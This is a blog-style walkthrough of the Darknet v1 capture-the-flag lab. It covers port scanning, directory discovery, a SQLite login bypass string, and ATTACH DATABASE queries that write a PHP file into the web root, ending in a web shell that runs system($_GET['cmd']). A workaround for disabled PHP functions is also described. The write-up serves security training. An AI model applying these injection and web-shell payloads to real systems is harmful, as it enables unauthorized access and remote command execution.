Thursday, 9 June 2016

Darknet v1 challenge

Hello all,
Today I would like to present the Darknet challenge solution.
Scanning phrase

OK, we have three open ports: 80, 111 and 43412. We have used aggressive mode in nmap and we can see for example version of apache. As far as I know this version doesn't have critical vulnerabilities. RPC info does not serve us nfs (we know how to exploit nfs). Let's verify our hypothesis.

OK, we should focus on the web application (practically as always :)).

Hmmmm, what do you think about dirb or dirbuster? I think so.

The /access/ directory looks attractive for our point of view.

Nice, we see backup file and we are able to download it. I have downloaded the file and content looks as follow

DirBuster have found /sec.php path additionally, but

Hmmm, we have got response 500 (internal server error), but at least we know that there exist a webmaster user.
I have no idea, what we could do else :-( The downloaded file has to be some kind of hint. Hmmm, let's try add to /etc/hosts following line

and let's try browse

and voila! Now let's run DirBuster again. Unfortunately we have got nothing interesting for us. I was trying brute-force the web based panel using hydra - without success, SQL Injection - without success, but I have filled in username as admin' and password whatsoever I have got result

The token looks as MD5 hashed string. I have cracked the string and I have got dasd. Hmmm maybe it is password? Grrr without success. SQLmap was trying also without success... I was googling "how to bypass authentication sqlite" and I have found!
We know from VirtualHost configuration that there is devnull user, so I have bypassed the authentication using devnull' OR '1 and random password.

Great! We are able to create our SQL backdoor. Let's try
ATTACH DATABASE '/home/devnull/public_html/img/info.php' as pwn;
CREATE TABLE (code TEXT); INSERT INTO (code) VALUES ("<pre><?php echo phpinfo(); ?></pre>");
and result

OK, it works! Now we are able to upload our backdoor, but unfortunately PHP configuration is not friendly for us, because there are disabled functions
system, eval, shell_exec, passthru, popen, proc_open, escapeshellarg, escapeshellcmd, exec, proc_close, proc_get_status, proc_nice, proc_terminate, pcntl_exec
so, my idea is to add empty php.ini file.
I did that using Administrator SQL and I have add sript
ATTACH DATABASE '/home/devnull/public_html/img/shell.php' as pwn;
CREATE TABLE (code TEXT); INSERT INTO (code) VALUES ("<pre><?php echo system($_GET['cmd']); ?></pre>");


Great! We have got limited shell!